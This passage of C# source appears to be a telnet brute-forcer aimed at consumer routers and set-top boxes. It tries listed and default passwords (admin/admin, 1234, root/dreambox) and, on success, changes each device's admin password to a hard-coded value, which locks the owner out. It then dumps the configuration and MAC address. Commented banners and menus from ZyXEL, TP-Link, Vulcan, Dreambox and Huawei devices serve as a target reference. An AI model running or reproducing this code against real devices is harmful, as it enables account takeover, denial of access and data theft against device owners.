  1661. stringdata = Encoding.ASCII.GetString(data, 0, recv);
  1662. Console.WriteLine("{0} -> Response telnet01: " + stringdata, myip);
  1663. }
  1664. // cisco/cisco
  1665. recv = Sock_scan.Receive(data);
  1666. stringdata = Encoding.ASCII.GetString(data, 0, recv);
  1667. Console.WriteLine("{0} -> Response telnet01a: " + stringdata, myip);
  1668. //Login Successful
  1669.  
  1670. //login:
  1671. if(stringdata.Contains("ogin:"))
  1672. {
  1673. Console.WriteLine("{0} -> BAD LOGIN/PASSWORD", myip);
  1674. }
  1675. else
  1676. {
  1677. //$
  1678. //$passwd
  1679. Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("passwd" + "\r"), SocketFlags.None);
  1680. recv = Sock_scan.Receive(data);
  1681. stringdata = Encoding.ASCII.GetString(data, 0, recv);
  1682. Console.WriteLine("{0} -> Response telnet01b: " + stringdata, myip);
  1683. if (banner.Contains("Vulcan"))
  1684. {
  1685. //Enter Old Password:
  1686. Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("admin" + "\r"), SocketFlags.None);
  1687. recv = Sock_scan.Receive(data);
  1688. stringdata = Encoding.ASCII.GetString(data, 0, recv);
  1689. Console.WriteLine("{0} -> Response telnet01c: " + stringdata, myip);
  1690. }
  1691. else
  1692. {
  1693. //This line does not appear on a BusyBox or a dreambox
  1694. }
  1695. //Enter New Password:
  1696. Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" + "\r"), SocketFlags.None);
  1697. recv = Sock_scan.Receive(data);
  1698. stringdata = Encoding.ASCII.GetString(data, 0, recv);
  1699. Console.WriteLine("{0} -> Response telnet01d: " + stringdata, myip);
  1700. //Confirm New Password:
  1701. Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" + "\r"), SocketFlags.None);
  1702. recv = Sock_scan.Receive(data);
  1703. stringdata = Encoding.ASCII.GetString(data, 0, recv);
  1704. Console.WriteLine("{0} -> Response telnet01e: " + stringdata, myip);
  1705. recv = Sock_scan.Receive(data);
  1706. stringdata = Encoding.ASCII.GetString(data, 0, recv);
  1707. Console.WriteLine("{0} -> Response telnet01f: " + stringdata, myip);
  1708. //Login incorrect (dreambox)
  1709.  
  1710. //Password changed
  1711.  
  1712. //Set Done
  1713. //SINON: Erreur: Combinaison nom utilisateur/mot de passe invalide
  1714.  
  1715. //passwd: An error occurred updating the password file. //BusyBox
  1716. }
  1717. //login:
  1718.  
  1719. Sock_scan.Close();
  1720. }
  1721.  
  1722. if (banner.Contains("assword:"))
  1723. {
  1724. #region BANNERS
  1725. //********************************************************
  1726. //Info:Connection was denied by remote host according to ACL!
  1727.  
  1728. //********************************************************
  1729. //Copyright (c) 2001 - 2006 TP-LINK TECHNOLOGIES CO., LTD
  1730. //admin
  1731. //Valid commands are:
  1732. //sys exit ether wan
  1733. //ip bridge dot1q pktqos
  1734. //show set lan
  1735.  
  1736. //********************************************************
  1737. //Copyright (c) 2001 - 2006 TrendChip Technologies Corp.
  1738. //1234
  1739. //Valid commands are:
  1740. //sys exit ether wan
  1741. //etherdbg usb ip bridge
  1742. //dot1q pktqos show set
  1743. //lan
  1744. //
  1745. //tc> sys countrycode
  1746. //country code = 253 //Djibouti
  1747.  
  1748. //********************************************************
  1749. // *******************
  1750. // Welcome to Vulcan
  1751. // *******************
  1752.  
  1753. //Conexant Inc., Software Release 3.C10MTT0.8822A
  1754. //Copyright (c) 2001-2003 by Conexant, Inc.
  1755.  
  1756. //login:
  1757. //admin
  1758.  
  1759. //password:
  1760. //admin
  1761. //Login Successful
  1762. //$
  1763. //$help
  1764. //Command Description
  1765. //------- -----------
  1766. //alias To Alias a command
  1767. //apply Apply configuration/image file
  1768. //commit Commit the active config to the flash
  1769. //create Create a new entry of specified type
  1770. //delete Delete the specified entry
  1771. //download Download a file on to the Device
  1772. //exit To exit the CLI shell
  1773. //get Display info for the search
  1774. //help Provides help
  1775. //list List files
  1776. //modify Modify information for specified entry
  1777. //passwd To modify user password
  1778. //ping The normal ping command
  1779. //prompt Change the user prompt
  1780. //reboot Reboot the device
  1781. //remove Remove file
  1782. //reset Reset info for the specified entry
  1783. //size ATM Sizing Information
  1784. //traceroute The normal traceroute command
  1785. //trigger To set trigger
  1786. //unalias To undefine previously defined alias
  1787. //verbose Switch ON/OFF the verbose mode
  1788.  
  1789.  
  1790. //********************************************************
  1791. //Password: 1234
  1792. //Copyright (c) 1994 - 2007 ZyXEL Communications Corp.
  1793. //ras>
  1794. //ras> help
  1795. //Valid commands are:
  1796. //sys exit ether wan
  1797. //aux wlan ip ipsec
  1798. //bridge certificates bm lan
  1799. //vlan radius 8021x autoSec
  1800. //ras> sys
  1801. //packetscan adjtime callhist countrycode
  1802. //date domainname edit extraphnum
  1803. //feature firewall myZyxelCom hostname
  1804. //logs stdio datetime time
  1805. //tos trcdisp trclog trcpacket
  1806. //version view wdog romreset
  1807. //upnp atsh atmu ateb
  1808. //xmodemmode diag save display
  1809. //adminPassword userPassword default fwnotify
  1810. //tripleplay general socket filter
  1811. //ddns cpu winmes snmp
  1812. //ras> sys adminPassword
  1813. //Usage: adminPassword <new adminPassword>
  1814. //ras> sys adminPassword j3R0m3!!
  1815.  
  1816. /*
  1817. Copyright (c) 1994 - 2003 ZyXEL Communications Corp.
  1818.  
  1819. Prestige 650R-E1 Main Menu
  1820.  
  1821. Getting Started Advanced Management
  1822. 1. General Setup 21. Filter Set Configuration
  1823. 3. LAN Setup 22. SNMP Configuration
  1824. 4. Internet Access Setup 23. System Password
  1825. 24. System Maintenance
  1826. Advanced Applications 25. IP Routing Policy Setup
  1827. 11. Remote Node Setup 26. Schedule Setup
  1828. 12. Static Routing Setup
  1829. 15. NAT Setup
  1830. 99. Exit
  1831.  
  1832.  
  1833.  
  1834.  
  1835.  
  1836.  
  1837. Enter Menu Selection Number:
  1838. */
  1839. /*
  1840. Menu 1 - General Setup
  1841.  
  1842. System Name= ?
  1843. Location=
  1844. Contact Person's Name=
  1845. Domain Name=
  1846. Edit Dynamic DNS= No
  1847.  
  1848. Route IP= Yes
  1849. Bridge= No
  1850.  
  1851.  
  1852.  
  1853.  
  1854.  
  1855.  
  1856.  
  1857.  
  1858. Press ENTER to Confirm or ESC to Cancel:
  1859. */
  1860. /*
  1861.  
  1862.  
  1863. Menu 23 - System Password
  1864.  
  1865. Old Password= ?
  1866. New Password= ?
  1867. Retype to confirm= ?
  1868.  
  1869.  
  1870.  
  1871.  
  1872.  
  1873.  
  1874.  
  1875.  
  1876.  
  1877.  
  1878.  
  1879.  
  1880.  
  1881. Enter here to CONFIRM or ESC to CANCEL:
  1882. */
  1883. /*
  1884. Menu 3 - LAN Setup
  1885.  
  1886. 1. LAN Port Filter Setup
  1887. 2. TCP/IP and DHCP Setup
  1888.  
  1889.  
  1890.  
  1891.  
  1892.  
  1893.  
  1894.  
  1895.  
  1896.  
  1897.  
  1898.  
  1899.  
  1900.  
  1901.  
  1902. Enter Menu Selection Number:
  1903. */
  1904. /*
  1905. Menu 3.1 - LAN Port Filter Setup
  1906.  
  1907. Input Filter Sets:
  1908. protocol filters=
  1909. device filters=
  1910. Output Filter Sets:
  1911. protocol filters=
  1912. device filters=
  1913. */
  1914. /*
  1915. Menu 3.2 - TCP/IP and DHCP Setup
  1916.  
  1917. DHCP Setup
  1918. DHCP= Server
  1919. Client IP Pool Starting Address= 192.168.1.33
  1920. Size of Client IP Pool= 32
  1921. Primary DNS Server= 0.0.0.0
  1922. Secondary DNS Server= 0.0.0.0
  1923. Remote DHCP Server= N/A
  1924. TCP/IP Setup:
  1925. IP Address= 192.168.1.1
  1926. IP Subnet Mask= 255.255.255.0
  1927. RIP Direction= Both
  1928. Version= RIP-2B
  1929. Multicast= None
  1930. IP Policies=
  1931. Edit IP Alias= No
  1932.  
  1933. Press ENTER to Confirm or ESC to Cancel:
  1934.  
  1935. Press Space Bar to Toggle.
  1936. */
  1937. /*
  1938. Menu 4 - Internet Access Setup
  1939.  
  1940. ISP's Name= MyISP
  1941. Encapsulation= PPPoE
  1942. Multiplexing= LLC-based
  1943. VPI #= 8
  1944. VCI #= 35
  1945. ATM QoS Type= UBR
  1946. Peak Cell Rate (PCR)= 0
  1947. Sustain Cell Rate (SCR)= 0
  1948. Maximum Burst Size (MBS)= 0
  1949. My Login= zemzem2
  1950. My Password= ********
  1951. Idle Timeout (sec)= 0
  1952. IP Address Assignment= Dynamic
  1953. IP Address= N/A
  1954. Network Address Translation= SUA Only
  1955. Address Mapping Set= N/A
  1956.  
  1957. Press ENTER to Confirm or ESC to Cancel:
  1958. */
  1959. /*
  1960. Menu 11 - Remote Node Setup
  1961.  
  1962. 1. MyISP (ISP, SUA)
  1963. 2. ________
  1964. 3. ________
  1965. 4. ________
  1966. 5. ________
  1967. 6. ________
  1968. 7. ________
  1969. 8. ________
  1970.  
  1971.  
  1972.  
  1973.  
  1974.  
  1975.  
  1976.  
  1977.  
  1978. Enter Node # to Edit:
  1979. */
  1980. /*
  1981. Menu 11.1 - Remote Node Profile
  1982.  
  1983. Rem Node Name= MyISP Route= IP
  1984. Active= Yes Bridge= No
  1985.  
  1986. Encapsulation= PPPoE Edit IP/Bridge= No
  1987. Multiplexing= LLC-based Edit ATM Options= No
  1988. Service Name= zyxel
  1989. Incoming: Telco Option:
  1990. Rem Login= Allocated Budget(min)= 0
  1991. Rem Password= ******** Period(hr)= 0
  1992. Outgoing: Schedule Sets=
  1993. My Login= zemzem2 Nailed-Up Connection= Yes
  1994. My Password= ******** Session Options:
  1995. Authen= CHAP/PAP Edit Filter Sets= No
  1996. Idle Timeout(sec)= N/A
  1997. Edit Traffic Redirect= No
  1998.  
  1999. Press ENTER to Confirm or ESC to Cancel:
  2000. */
  2001. /*
  2002. Menu 21 - Filter Set Configuration
  2003.  
  2004. Filter Filter
  2005. Set # Comments Set # Comments
  2006. ------ ----------------- ------ -----------------
  2007. 1 _______________ 7 _______________
  2008. 2 _______________ 8 _______________
  2009. 3 _______________ 9 _______________
  2010. 4 _______________ 10 _______________
  2011. 5 _______________ 11 _______________
  2012. 6 _______________ 12 _______________
  2013.  
  2014.  
  2015.  
  2016. Enter Filter Set Number to Configure= 0
  2017.  
  2018. Edit Comments= N/A
  2019.  
  2020. Press ENTER to Confirm or ESC to Cancel:
  2021. */
  2022. /*
  2023. Menu 21.1 - Filter Rules Summary
  2024.  
  2025. # A Type Filter Rules M m n
  2026. - - ---- --------------------------------------------------------------- - - -
  2027. 1 N
  2028. 2 N
  2029. 3 N
  2030. 4 N
  2031. 5 N
  2032. 6 N
  2033.  
  2034.  
  2035.  
  2036.  
  2037.  
  2038.  
  2039.  
  2040.  
  2041. Enter Filter Rule Number (1-6) to Configure:
  2042.  
  2043. */
  2044. /*
  2045. Menu 21.1.1 - TCP/IP Filter Rule
  2046.  
  2047. Filter #: 1,1
  2048. Filter Type= TCP/IP Filter Rule
  2049. Active= No
  2050. IP Protocol= 0 IP Source Route= No
  2051. Destination: IP Addr=
  2052. IP Mask=
  2053. Port #=
  2054. Port # Comp= None
  2055. Source: IP Addr=
  2056. IP Mask=
  2057. Port #=
  2058. Port # Comp= None
  2059. TCP Estab= N/A
  2060. More= No Log= None
  2061. Action Matched= Check Next Rule
  2062. Action Not Matched= Check Next Rule
  2063.  
  2064. Press ENTER to Confirm or ESC to Cancel:
  2065. Press Space Bar to Toggle.
  2066. */
  2067. /*
  2068. Menu 22 - SNMP Configuration
  2069.  
  2070. SNMP:
  2071. Get Community= public
  2072. Set Community= public
  2073. Trusted Host= 0.0.0.0
  2074. Trap:
  2075. Community= public
  2076. Destination= 0.0.0.0
  2077.  
  2078.  
  2079.  
  2080.  
  2081.  
  2082.  
  2083.  
  2084.  
  2085.  
  2086. Press ENTER to Confirm or ESC to Cancel:
  2087. */
  2088. /*
  2089. Menu 24 - System Maintenance
  2090.  
  2091. 1. System Status
  2092. 2. System Information and Console Port Speed
  2093. 3. Log and Trace
  2094. 4. Diagnostic
  2095. 5. Backup Configuration
  2096. 6. Restore Configuration
  2097. 7. Upload Firmware
  2098. 8. Command Interpreter Mode
  2099. 9. Call Control
  2100. 10. Time and Date Setting
  2101. 11. Remote Management
  2102.  
  2103.  
  2104.  
  2105.  
  2106.  
  2107. Enter Menu Selection Number:
  2108. */
  2109. /*
  2110. Enter Menu Selection Number: 8
  2111.  
  2112.  
  2113. Copyright (c) 1994 - 2003 ZyXEL Communications Corp.
  2114. ras> help
  2115. Valid commands are:
  2116. sys exit ether wan
  2117. ip bridge
  2118. ras>
  2119. */
  2120. /*
  2121. Menu 24.11 - Remote Management Control
  2122.  
  2123. TELNET Server:
  2124. Server Port = 23 Server Access = ALL
  2125. Secured Client IP = 0.0.0.0
  2126.  
  2127. FTP Server:
  2128. Server Port = 21 Server Access = ALL
  2129. Secured Client IP = 0.0.0.0
  2130.  
  2131. Web Server:
  2132. Server Port = 80 Server Access = ALL
  2133. Secured Client IP = 0.0.0.0
  2134.  
  2135.  
  2136.  
  2137.  
  2138.  
  2139. Press ENTER to Confirm or ESC to Cancel:
  2140. */
  2141.  
  2142.  
  2143.  
  2144.  
  2145. //********************************************************
  2146. //**************************
  2147. //* *
  2148. //* The Gemini Project *
  2149. //* *
  2150. //**************************
  2151.  
  2152. //welcome on your dreambox! - Kernel 2.6.9 (17:51:55).
  2153.  
  2154. //dreambox login: admin
  2155. //Password:
  2156. //Login incorrect
  2157. //dreambox login:
  2158. //
  2159. //root/dreambox
  2160.  
  2161.  
  2162. //********************************************************
  2163. //***************************
  2164. //* *
  2165. //* The Gemini Project *
  2166. //* *
  2167. //***************************
  2168. //* Prepared By "drhg" *
  2169. //* ( Dream-Gaza Team ) *
  2170. //* www.dreamgaza.com *
  2171. //***************************
  2172.  
  2173. //Checking Kernel, Please Wait ....
  2174.  
  2175. //Kernel 2.6.9.
  2176. //md5sum (dreambox Linux ppc ).
  2177. //head.ko = 308509 bytes.
  2178. //Safe, NO 'clone bomb' found ... Congratulations.
  2179.  
  2180. //Enjoy Original Gemini Project without Time Bomb !.
  2181. //---------------------------------------------------
  2182.  
  2183. //(Friday, 17 September 2010).
  2184. //welcome on your dreambox! - Kernel 2.6.9 (10:46:22).
  2185.  
  2186.  
  2187. //dreambox login: bad
  2188. //Password:
  2189. //Login incorrect
  2190. //dreambox login: root
  2191. //Password:
  2192. //Login incorrect
  2193. //dreambox login: root
  2194. //Password:
  2195. //Login incorrect
  2196.  
  2197. //********************************************************
  2198. //OpenDreambox 1.5.0 dm800
  2199.  
  2200. //dm800 login:
  2201. //dm800 login: bad
  2202. //Password:
  2203. //Login incorrect
  2204. //dm800 login: root
  2205. //root@dm800:~#
  2206. //CCcam_2011 head pyhtmlizer
  2207. //StartNabCam hexdump python
  2208. //\[ hostname rdjpgcom
  2209. //addgroup hotplug readlink
  2210. //adduser id reboot
  2211. //ar ifconfig reboot.sysvinit
  2212. //arping ifdown renice
  2213. //ash ifup reset
  2214. //automount im rjoe
  2215. //avahi-daemon inadyn rm
  2216. //awk inadyn_script.sh rmdir
  2217. //basename inetd rmmod
  2218. //bdpoll init route
  2219. //bookify init.sysvinit rquotad
  2220. //bunzip2 insmod run-parts
  2221. //busybox ip runlevel
  2222. //bzcat ipkg rx
  2223. //cat ipkg-cl scp
  2224. //cftp ipkg-link sed
  2225. //chat iwconfig seq
  2226. //chgrp iwgetid sfdisk
  2227. //chmod iwlist sh
  2228. //chown iwpriv sha1sum
  2229. //chroot iwspy showiframe
  2230. //chvt jmacs showmount
  2231. //cjpeg joe shutdown
  2232. //ckeygen jpegtran shutdown.sysvinit
  2233. //clear jpico sleep
  2234. //conch jstar smartctl
  2235. //cp kill smartd
  2236. //cpio killall smbd
  2237. //crond killall5 sort
  2238. //crontab klogd ssh
  2239. //cut last start-stop-daemon
  2240. //czap last.sysvinit statd
  2241. //date lastb streamproxy
  2242. //dbclient ldconfig strings
  2243. //dbus-cleanup-sockets less stty
  2244. //dbus-daemon lessecho su
  2245. //dbus-launch lesskey sulogin
  2246. //dbus-monitor ln swapoff
  2247. //dbus-send loadfont swapon
  2248. //dbus-uuidgen loadkmap sync
  2249. //dc lockd sysctl
  2250. //dccamd logger syslogd
  2251. //dd login szap
  2252. //deallocvt logname t-im
  2253. //delgroup logread tail
  2254. //deluser lore tap2deb
  2255. //depmod losetup tap2rpm
  2256. //depmod.26 ls tapconvert
  2257. //df lsmod tar
  2258. //dirname mailmail tda1002x
  2259. //djpeg makedevs tee
  2260. //dmesg manhole telinit
  2261. //dos2unix map-mbone telnet
  2262. //dropbear mc telnetd
  2263. //dropbearconvert mcedit termidx
  2264. //dropbearkey mcmfmt test
  2265. //dropbearmulti mcview time
  2266. //du md5sum tkconch
  2267. //dumpkmap mesg top
  2268. //dvbsnoop mesg.sysvinit touch
  2269. //dvbtraffic mkdir tput
  2270. //e2fsck mke2fs tr
  2271. //echo mkfifo traceroute
  2272. //egrep mkfs.ext2 trial
  2273. //enigma2 mkfs.ext3 true
  2274. //enigma2.sh mknod tset
  2275. //env mkswap tty
  2276. //ethtool mktap tuxtxt
  2277. //exportfs mktemp twistd
  2278. //expr modprobe tzap
  2279. //false more udhcpc
  2280. //fbset mount umount
  2281. //fdisk mountd uname
  2282. //fdisk.util-linux mountpoint uniq
  2283. //femon mrinfo unix2dos
  2284. //fgrep mrouted unzip
  2285. //find mv update-alternatives
  2286. //free nc update-inetd
  2287. //fsck.ext2 netstat update-modules
  2288. //fsck.ext3 nfs_server_script.sh update-passwd
  2289. //ftpget nfsd update-rc.d
  2290. //ftpput nfsstat uptime
  2291. //getepgchannels nhfsgraph utmpdump
  2292. //getkey nhfsnums uudecode
  2293. //getty nhfsrun uuencode
  2294. //grab nhfsstone vi
  2295. //grep nmbd vlock
  2296. //gst-feedback nslookup vsftpd
  2297. //gst-feedback-0.10 od wall
  2298. //gst-inspect openvpn wall.sysvinit
  2299. //gst-inspect-0.10 openvpn_script.sh watch
  2300. //gst-launch openvt wc
  2301. //gst-launch-0.10 passwd wdog
  2302. //gst-typefind patch wget
  2303. //gst-typefind-0.10 pidof which
  2304. //gst-visualise-0.10 pidof.sysvinit who
  2305. //gst-xmlinspect ping whoami
  2306. //gst-xmlinspect-0.10 pivot_root wpa_cli
  2307. //gst-xmllaunch poff wpa_passphrase
  2308. //gst-xmllaunch-0.10 pon wpa_supplicant
  2309. //gunzip portmap wrjpgcom
  2310. //gzip poweroff xargs
  2311. //halt pppd yes
  2312. //halt.sysvinit printf zcat
  2313. //hddtemp ps zeroconf
  2314. //hdparm pwd
  2315. //root@dm800:~#
  2316. //root@dm800:~# passwd
  2317. //Changing password for root
  2318. //Enter the new password (minimum of 5, maximum of 8 characters)
  2319. //Please use a combination of upper and lower case letters and numbers.
  2320. //Enter new password:
  2321. //Re-enter new password:
  2322. //Password changed.
  2323. //root@dm800:~#
  2324.  
  2325.  
  2326. //********************************************************
  2327. //BusyBox on (none) login: bad
  2328. //Password:
  2329. //Login incorrect
  2330.  
  2331. //BusyBox on (none) login: admin
  2332. //Password:
  2333.  
  2334.  
  2335. //BusyBox v0.61.pre (2008.01.25-06:33+0000) Built-in shell (ash)
  2336. //Enter 'help' for a list of built-in commands.
  2337.  
  2338. //# help
  2339.  
  2340. //Built-in commands:
  2341. //-------------------
  2342. // . : bg break builtin cd chdir continue eval exec exit export
  2343. // false fc fg hash help jobs kill local pwd read readonly return
  2344. // set setvar shift times trap true type ulimit umask unset wait
  2345.  
  2346.  
  2347. //********************************************************
  2348. //User Access Verification
  2349. //
  2350. //Password:
  2351. //Password:
  2352. //Password:
  2353. //% Bad passwords
  2354.  
  2355.  
  2356. //********************************************************
  2357. //Huawei Home Gateway 550
  2358. //wl driver adapter not found
  2359. //wl driver adapter not found
  2360. //wl driver adapter not found
  2361. //wl driver adapter not found
  2362. //wl driver adapter not found
  2363. //wl driver adapter not found
  2364. //wl driver adapter not found
  2365. //wl driver adapter not found
  2366. //Login: bad
  2367. //Password:
  2368. //Login incorrect. Try again.
  2369. //Login: admin
  2370. //Password:
  2371. //Login incorrect. Try again.
  2372. //Login: admin
  2373. //Password:
  2374. //Authorization failed after trying 3 times!!!.
  2375. //wl driver adapter not found
  2376. //wl driver adapter not found
  2377. //wl driver adapter not found
  2378. //wl driver adapter not found
  2379. //wl driver adapter not found
  2380. //wl driver adapter not found
  2381. //wl driver adapter not found
  2382. //wl driver adapter not found
  2383. //Login:
  2384.  
  2385. #endregion
  2386.  
  2387. foreach (string password in passwords)
  2388. {
  2389. Thread.Sleep(100);
  2390. try
  2391. {
  2392. Sock_scan = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
  2393. Sock_scan.Connect(ip);
  2394.  
  2395.  
  2396. recv = Sock_scan.Receive(data);
  2397. stringdata = Encoding.ASCII.GetString(data, 0, recv);
  2398. // Console.WriteLine("{0} -> Banner telnet: " + stringdata, myip);
  2399.  
  2400. //Console.WriteLine("DEBUG Trying Password:{0}", password);
  2401. //Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes(password + Convert.ToChar(13) + Convert.ToChar(10)));
  2402. Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes(password+"\r"),SocketFlags.None);
  2403. /*
  2404. Byte[] smk = new Byte[password.Length];
  2405. for (int i = 0; i < password.Length; i++)
  2406. {
  2407. Byte ss = Convert.ToByte(password[i]);
  2408. smk[i] = ss;
  2409. }
  2410. Sock_scan.Send(smk, 0, smk.Length, SocketFlags.None);
  2411. */
  2412.  
  2413. //Thread.Sleep(100);
  2414.  
  2415. recv = Sock_scan.Receive(data);
  2416. stringdata = Encoding.ASCII.GetString(data, 0, recv);
  2417. //Console.WriteLine("{0} -> Response telnet: " + stringdata, myip);
  2418. recv = Sock_scan.Receive(data);
  2419. stringdata = Encoding.ASCII.GetString(data, 0, recv);
  2420. Console.WriteLine("{0} -> Response telnet02: " + stringdata, myip);
  2421. if (stringdata == "")
  2422. {
  2423. recv = Sock_scan.Receive(data);
  2424. stringdata = Encoding.ASCII.GetString(data, 0, recv);
  2425. Console.WriteLine("{0} -> Response telnet02b: " + stringdata, myip);
  2426. }
  2427.  
  2428. //stringdata = null;
  2429. //bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
  2430. //stringdata = stringdata + ASCII.GetString(RecvBytes, 0, bytes);
  2431. //Console.WriteLine("Response telnet: " + strRetPage);
  2432. //while (bytes > 0)
  2433. //{
  2434. // bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
  2435. // stringdata = stringdata + ASCII.GetString(RecvBytes, 0, bytes);
  2436. // Console.WriteLine("Response telnet: " + strRetPage);
  2437. //}
  2438.  
  2439.  
  2440.  
  2441. //Bad Password!!!
  2442. if (stringdata.Contains("assword:") || stringdata.Contains("Bad Password")) //stringdata.Contains("*")
  2443. {
  2444. // Console.WriteLine("{0} -> bad telnet password: {1}\n", myip, password);
  2445. Sock_scan.Close();
  2446. }
  2447. else
  2448. {
  2449. Console.WriteLine("***********************************************************");
  2450. Console.WriteLine("{0} -> TELNET PASSWORD FOUND: {1}\n", myip, password);
  2451. Console.WriteLine("***********************************************************");
  2452.  
  2453. if(stringdata.Contains("ZyXEL")) //1234
  2454. {
  2455. if (stringdata.Contains("Menu")) //1234
  2456. {
  2457. Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("23" + "\r"), SocketFlags.None);
  2458. recv = Sock_scan.Receive(data);
  2459. stringdata = Encoding.ASCII.GetString(data, 0, recv);
  2460. Console.WriteLine("{0} -> " + stringdata, myip);
  2461.  
  2462. // Menu 23 - System Password
  2463. //Old Password= ?
  2464. //New Password= ?
  2465. //Retype to confirm= ?
  2466.  
  2467. Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes(password + "\r"), SocketFlags.None);
  2468. recv = Sock_scan.Receive(data);
  2469. stringdata = Encoding.ASCII.GetString(data, 0, recv);
  2470. Console.WriteLine("{0} -> " + stringdata, myip);
  2471.  
  2472. Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" + "\r"), SocketFlags.None);
  2473. recv = Sock_scan.Receive(data);
  2474. stringdata = Encoding.ASCII.GetString(data, 0, recv);
  2475. Console.WriteLine("{0} -> " + stringdata, myip);
  2476.  
  2477. Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" + "\r"), SocketFlags.None);
  2478. recv = Sock_scan.Receive(data);
  2479. stringdata = Encoding.ASCII.GetString(data, 0, recv);
  2480. Console.WriteLine("{0} -> " + stringdata, myip);
  2481.  
  2482. Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("\r"), SocketFlags.None);
  2483. recv = Sock_scan.Receive(data);
  2484. stringdata = Encoding.ASCII.GetString(data, 0, recv);
  2485. Console.WriteLine("{0} -> " + stringdata, myip);
  2486.  
  2487. //(Saving to ROM...)
  2488. //Retour menu
  2489. }
  2490. else
  2491. {
  2492. Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("sys adminPassword j3R0m3!!" + "\r"), SocketFlags.None);
  2493. recv = Sock_scan.Receive(data);
  2494. stringdata = Encoding.ASCII.GetString(data, 0, recv);
  2495. Console.WriteLine("{0} -> " + stringdata, myip);
  2496. }
  2497. }
  2498. else
  2499. {
  2500. Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("sys password j3R0m3!!" + "\r"), SocketFlags.None);
  2501. recv = Sock_scan.Receive(data);
  2502. stringdata = Encoding.ASCII.GetString(data, 0, recv);
  2503. Console.WriteLine("{0} -> " + stringdata, myip);
  2504. //save ok, new password is: j3R0m3!!.
  2505.  
  2506. ////Exemple: Vulcan
  2507. ////Erreur: Commande Invalide
  2508. ////$passwd
  2509. //Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("passwd" + "\r"), SocketFlags.None);
  2510. ////Enter Old Password:
  2511. //Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("admin" + "\r"), SocketFlags.None);
  2512. ////Enter New Password:
  2513. //Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" + "\r"), SocketFlags.None);
  2514. ////Confirm New Password:
  2515. //Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" + "\r"), SocketFlags.None);
  2516. ////Set Done
  2517. ////SINON: Erreur: Combinaison nom d'utilisateur/mot de passe invalide
  2518. }
  2519.  
  2520. Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("show all" + "\r"), SocketFlags.None);
  2521. recv = Sock_scan.Receive(data);
  2522. stringdata = Encoding.ASCII.GetString(data, 0, recv);
  2523. Console.WriteLine("{0} -> " + stringdata, myip);
  2524. recv = Sock_scan.Receive(data);
  2525. stringdata = Encoding.ASCII.GetString(data, 0, recv);
  2526. Console.WriteLine("{0} -> " + stringdata, myip);
  2527. recv = Sock_scan.Receive(data);
  2528. stringdata = Encoding.ASCII.GetString(data, 0, recv);
  2529. Console.WriteLine("{0} -> " + stringdata, myip);
  2530. recv = Sock_scan.Receive(data);
  2531. stringdata = Encoding.ASCII.GetString(data, 0, recv);
  2532. Console.WriteLine("{0} -> " + stringdata, myip);
  2533. recv = Sock_scan.Receive(data);
  2534. stringdata = Encoding.ASCII.GetString(data, 0, recv);
  2535. Console.WriteLine("{0} -> " + stringdata, myip);
  2536.  
  2537.  
  2538. //***************
  2539. Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("sys atsh" + "\r"), SocketFlags.None); //for MAC address
  2540. recv = Sock_scan.Receive(data);
  2541. stringdata = Encoding.ASCII.GetString(data, 0, recv);
  2542. Console.WriteLine("{0} -> " + stringdata, myip);
  2543. recv = Sock_scan.Receive(data);
  2544. stringdata = Encoding.ASCII.GetString(data, 0, recv);
  2545. Console.WriteLine("{0} -> " + stringdata, myip);
  2546. recv = Sock_scan.Receive(data);
  2547. stringdata = Encoding.ASCII.GetString(data, 0, recv);
  2548. Console.WriteLine("{0} -> " + stringdata, myip);
  2549. recv = Sock_scan.Receive(data);
  2550. stringdata = Encoding.ASCII.GetString(data, 0, recv);
  2551. Console.WriteLine("{0} -> " + stringdata, myip);
  2552. recv = Sock_scan.Receive(data);
  2553. stringdata = Encoding.ASCII.GetString(data, 0, recv);
  2554. Console.WriteLine("{0} -> " + stringdata, myip);
  2555.  
  2556.  
  2557. /*
  2558. D-Link DSL 526B >restoredefault
  2559. Huawei SmartAX MT882a >sys romreset
  2560. TP-Link TD-8817 >sys romreset
  2561. */
  2562.  
  2563. //***************
  2564. //For MT882A
  2565. /*
  2566. MT882a> ether config
  2567. --------------- NDIS CONFIGURATION BLOCK ----------------
  2568. type=1 flags=0001
  2569. Board/Chassis:1 Lines/Board:1 Channels/Lines:2 Total Channel:2
  2570. task-id=8041f1f4 event-q=80458c2c(19) data-q=80458c70(1a) func-id=2
  2571. board-cfg=8042c8a4 line-cfg=8042c8bc chann-cfg=8042c8d0
  2572. board-pp (8042c8f0)
  2573. 804273fc
  2574. line-pp (8042c8f4)
  2575. 8042956c
  2576. chann-pp (8042c8f8)
  2577. 804bf8a4 804bfe34
  2578. --------------- BOARD DISPLAY ---------------------------
  2579. ID slot# n-line n-chann status line-cfg chann-cfg
  2580. 00 0 1 2 0001 8042c8bc 8042c8d0
  2581. --------------- LINE DISPLAY ---------------------------
  2582. ID line# board-id n-chann chann-cfg
  2583. 00 1 00 2 8042c8d0
  2584. --------------- CHANNEL DISPLAY -------------------------
  2585. ID chan# line-id board-id address name
  2586. 00 1 00 00 804bf8a4 enet0
  2587. 01 2 00 00 804bfe34 enet1
  2588. */
  2589. Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("ether config" + "\r"), SocketFlags.None);
  2590. recv = Sock_scan.Receive(data);
  2591. stringdata = Encoding.ASCII.GetString(data, 0, recv);
